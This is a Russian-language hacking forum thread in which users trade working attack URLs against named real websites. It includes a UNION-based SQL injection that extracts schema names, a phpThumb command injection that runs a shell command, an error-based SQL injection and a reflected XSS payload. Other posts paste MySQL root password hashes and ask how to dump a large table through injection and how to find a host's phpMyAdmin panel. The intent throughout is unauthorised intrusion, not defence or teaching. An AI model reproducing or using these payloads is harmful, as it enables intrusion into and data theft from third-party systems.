Короче это угар Конечно, но благодаря ошибки и получасется вывод. Вот так ты сможешь провдить инъекцию =) http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version(),SCHEMA_NAME)+from+information_schema.SCHEMATA+LIMIT+1,2+--+
http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=http://wwwwwwww/&ws=320&hs=240&f=png code inj обьясните в кратце как использовать
http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=/home/site.com/public_html/kartinka.jpg&fltr[]=blur|5%20-quality%2075%20-interlace%20line%20%22/home/site.com/public_html/kartinka.jpg%22%20jpeg:%22/home/site.com/public_html/kartinka.jpg%22%20;%20ls%20-la%20;&phpThumbDebug=9
это может быть уязвимо? Microsoft OLE DB Provider for SQL Server error '80040e21' Invalid character value for cast specification. /view_lesson_plan.asp, line 21 если по этой ошибке трудно сказать оставлю линк и ещё одна Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to int. /scammer.asp, line 32
Попробуй логическое выражение.. Ваапще наврено будет скуля но тока этовинда там другой синтаксис если что..
Ну всмысле там MS SQL. Где то была статья , даже мож и на ачате, про проведение инъекции. Ну гугл точно найдёт
http://clustercenter.org/login.php?return=/index/month/&category=1' просто ошибка? не крутится скуля такая? пробывал у меня не вышло
Lilo в выводе ошибки мускула есть пассивная xss Code: http://clustercenter.org/login.php?return=/index/month/&category=<script>alert("xss")</script>'
_http://clustercenter.org/login.php?return=/index/month/&category=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))+--+
Ребята, подскажите чем зашифрованы пароли в базе данных mysql.user если они имеют такой вид: root *6E8611756F31DE90B29395C382E276861503CB8B debian-sys-maint *0B749C627EED121EBC71FBFEE656100950D0C2E4
root *6E8611756F31DE90B29395C382E276861503CB8B вот в этой теме расшифровка расшифровка hash. Part3 (DES, MySQL, SHA-1)
каким скриптом\прогой лучше сдампить таблицу через sql-inj? записей около 500k sipt и toolza на катят
подскажите адрес phpmyadmin хостинга logol.ru. Буду очень благодарен. Или же расскажите как узнавать адреса phpmyadmin? может скрипт есть какой то?